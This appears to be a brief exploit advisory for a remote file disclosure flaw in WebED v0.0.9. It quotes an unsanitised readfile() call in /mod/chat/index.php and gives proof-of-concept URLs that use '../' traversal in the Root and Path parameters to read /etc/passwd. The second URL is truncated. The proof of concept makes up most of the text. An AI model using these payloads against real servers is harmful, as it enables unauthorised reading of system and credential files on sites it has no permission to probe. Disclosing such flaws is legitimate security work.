WebED version 0.0.9 suffers from a remote file disclosure vulnerability in index.php.
150a0fc1508eba2f9756b47e06851150974ee8c1ab3841c751e7a4d7a618c1ef
WebED v0.0.9 (index.php) Remote File Disclosure Vulnerabilities
Script : http://heanet.dl.sourceforge.net/sourceforge/ed-engine/WebED_v0.0.9.tar.gz
Vuln Code In /mod/chat/index.php :
<body>
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
PoC :
/mod/chat/index.php?Root=../../../../../../etc/passwd
/mod/chat/index.php?Path=../../../../../../etc/pa